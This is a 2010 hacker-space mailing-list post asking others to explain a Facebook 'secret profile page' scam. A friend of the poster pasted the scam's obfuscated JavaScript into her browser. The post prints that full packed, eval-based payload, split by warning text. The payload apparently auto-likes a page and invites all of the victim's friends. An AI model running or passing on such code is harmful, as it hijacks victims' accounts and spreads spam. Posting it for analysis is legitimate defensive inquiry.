[Noisebridge-discuss] What does this Facebook javascript malware do?

Lee Sonko lee at lee.org
Fri May 7 18:11:41 UTC 2010


A friend received this Facebook malware. It told her to copy and paste the
malware below into her browser. She did :-(

She tells me that it then pulled up a Facebook page and invited all her
Facebook friends to the malware page.

 

Can you, the javascript enabled hacker tell what it does? I'm guessing the
RexExp runs a substitution cipher on that long string of characters but I'm
lost from there.

 

I've been watching the number of "People Like This" on the page grow from
1,000 to 1,500 in the past 20 minutes.  

 

 

 

 

http://www.face

CAUTION DON'T FOLLOW THE INSTRUCTIONS ON THIS PAGE

book.com/pages/shhh-its-the-new-secret-profile-page-click-here/1187939614746
52

 

 

 

javascript:(fun

MALWARE DON'T RUN

ction(){a='app117185681648577_TPCCax';b='app117185681648577_YbDOrx';djzaef='
app117185681648577_djzaef';wNPOwN='app117185681648577_wNPOwN';cWsFYs='app117
185681648577_cWsFYs';eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':
e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(
!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return
r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new
RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('J
e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r
\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\
\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\
f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","
\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\
\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r",
"\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f
\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d
=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e
[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W
[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e
[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73
|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeou
t|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44
|document|cWsFYs|fs|SocialGraphManager|wNPOwN|djzaef|||||||'.split('|'),0,{}
))})();        

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://www.noisebridge.net/pipermail/noisebridge-discuss/attachments/20100507/c0ab8e40/attachment-0002.html>


More information about the Noisebridge-discuss mailing list